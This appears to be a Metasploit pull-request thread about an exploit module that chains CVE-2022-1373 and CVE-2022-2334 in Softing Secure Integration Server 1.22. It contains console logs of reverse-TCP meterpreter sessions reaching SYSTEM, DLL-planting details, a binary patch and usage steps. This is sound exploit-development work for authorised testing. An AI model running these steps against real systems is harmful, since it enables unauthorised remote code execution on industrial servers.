Open ide0x90 opened 2 months ago
@ide0x90 what's the best way to get the installer from you?
@ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?
@ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?
Yes, please send the link to msfdev@metasploit.com
@ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?
Yes, please send the link to msfdev@metasploit.com
Shared the installer
@ide0x90 what's the best way to get the installer from you?
I can share the installer over Google Drive, if that's OK?
Yes, please send the link to msfdev@metasploit.com
Shared the installer
Got it; thanks!
Hi there; I've hit a few snags, but I think I have it mostly working- the only catch is that I get an error message when it tries to restore the configuration, reporting Not available in current system state
Is there something I need to do to finish setting up the target?
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.111:8099 - Found Softing Secure Integration Server 1.22.0.8686
[*] 16b85d3ea1537a32b0e4e86800fa074d
[+] 10.5.132.111:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] 10.5.132.111:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_1036106ee02065ab4c967afd43893333.zip
[-] 10.5.132.111:8099 - {"Message"=>"Not available in current system state."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.111:8099 - Returned code 400, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) >
Darn, I forgot about that error - it's a tricky one that needs a workaround. I sent more stuff to msfdev@metasploit.com with additional info.
Hey- looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?
Hey- looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?
The patch is to get around the "Not available in current system state" error. I wasn't able to get the "Restore Configuration" functionality working without it.
Hey- looking back at this now. Why is this patch required? Is it something normally seen in the wild, or is this to simulate a setting normally seen in the wild?
The patch is to get around the "Not available in current system state" error. I wasn't able to get the "Restore Configuration" functionality working without it.
I guess the question is that this patch is likely not in a production environment, so would this exploit work in a production environment without the patch? If this is a binary bypass to a setting like a paid subscription or an activation tier, that would make sense, but I'm just curious what setting this patch emulates.
This patch changes a single byte to bypass the "Not available in current system state" error. I think this error happens because the trial version was used, but I have no way to prove that, or to confirm if it would work in production.
msf6 exploit(windows/http/softing_sis_rce) > show options
Module options (exploit/windows/http/softing_sis_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLPATH no Custom compiled DLL to use
PASSWORD admin no The password to specify for authentication
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 8099 yes The target port (TCP)
SIGNATURE no Use a username/signature pair instead of username/password pair to authenticate
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin no The username to specify for authentication.
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/softing_sis_rce) > set rhosts 10.5.132.252
rhosts => 10.5.132.252
msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49703) at 2024-06-10 20:18:58 -0500
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
meterpreter > sysinfo
Computer : WIN-JGPU2LIT1DJ
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
For what it is worth, I was able to get the exploit to work on our default DLL payload, but it did pop an error. Is there a reason to use a custom payload to circumvent this error? I can still interact with the server. There are decided advantages to using the default payload and not having to maintain something new.
msf6 exploit(windows/http/softing_sis_rce) > show options
Module options (exploit/windows/http/softing_sis_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLPATH no Custom compiled DLL to use
PASSWORD admin no The password to specify for authentication
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.132.252 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 8099 yes The target port (TCP)
SIGNATURE no Use a username/signature pair instead of username/password pair to authenticate
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME admin no The username to specify for authentication.
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/softing_sis_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/softing_sis_rce) > check
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[*] 10.5.132.252:8099 - The target appears to be vulnerable.
msf6 exploit(windows/http/softing_sis_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.252:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 10.5.132.252:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] Generating payload DLL...
[*] Created /home/tmoose/.msf4/local/wbemcomn.dll
[*] Sending stage (201798 bytes) to 10.5.132.252
[*] 10.5.132.252:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_f69e17191ecd61e635578747747900f9.zip
[-] 10.5.132.252:8099 - {"ErrorIdentifier"=>"errIdInternalError", "Message"=>"Internal error."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.252:8099 - Returned code 500, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) > [*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.252:49728) at 2024-06-11 08:18:35 -0500
msf6 exploit(windows/http/softing_sis_rce) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN-JGPU2LIT1DJ
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
The reason I used a custom DLL was because a default msfvenom
DLL would get loaded by the Softing process during restore, but the shell wouldn't pop. I got around that by compiling the DLL with a def
file which has the correct exports so it gets loaded properly, but this causes 18 short-lived shells to spawn and the process to crash. I took inspiration from the code written for https://github.com/rapid7/metasploit-framework/pull/9041/files to work around that.
I couldn't get the cleanup to work properly. If the exploit has been executed successfully before, it will fail in subsequent runs because the existing wbemcomn.dll
won't be overwritten. This will result in the "Internal Error" message. This also leads to new shells because the existing wbemcomn.dll
gets loaded again during the subsequent exploit attempts.
This PR adds a module and related materials for CVE-2022-1373 and CVE-2022-2334 exploit chain against Softing Secure Integration Server 1.22 that was used during Pwn2Own 2022 Miami. This is dependent on https://github.com/rapid7/metasploit-framework/pull/19075.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/http/softing_sis_rce
set RHOSTS <target_ip>
set SSL true
if necessaryset RPORT <target_port>
if SSL is setset USERNAME <username>
if necessary. Default isadmin
set PASSWORD <password>
if necessary. Default isadmin
set SIGNATURE <signature>
to use signature authentication.PASSWORD
will be ignored ifSIGNATURE
is set!set DLLPATH <path_to_custom_dll>
to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.exploit
and get a shellC:\\Windows\\System32\\wbem\\wbemcomn.dll
Vulnerable Software
Softing Secure Integration Server 1.22
This version is no longer available for download on the vendor's page, but I have a copy of the installer that I can provide.
Test Environment
Widnows Server 2019 Standard x64.
Test run
TODO
session.fs.file.rm
doesn't.